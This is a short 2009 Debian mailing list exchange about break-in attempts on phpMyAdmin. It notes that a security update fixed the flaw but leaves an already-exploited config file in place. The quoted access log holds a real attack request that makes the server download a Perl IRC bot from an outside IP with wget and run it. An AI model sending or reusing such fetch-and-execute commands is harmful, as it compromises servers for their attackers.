Hi Dne Mon, 29 Jun 2009 10:58:18 +0200 Thijs Kinkhorst <th...@debian.org> napsal(a):
> Hi Laurant, > > > After looking at my logs, I did notice a lot of attempts to break in > > phpmyadmin through the following kind of url: > > > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET > > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t > >mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null& > > > > It seems PHPMyAdmin shipped with Lenny is still vulnerable to this > > remote exploit > > > > It is basically an IRC bot > > Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed, > has been released last Thursday with 1824-1, specifically to address this > issue. So if all is right then you should be safe from this issue. > > Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this > issue? phpMyAdmin is not vulnerable, but exploited config file is still there even after upgrade.... -- Michal Čihař | http://cihar.com | http://blog.cihar.com
signature.asc
Description: PGP signature
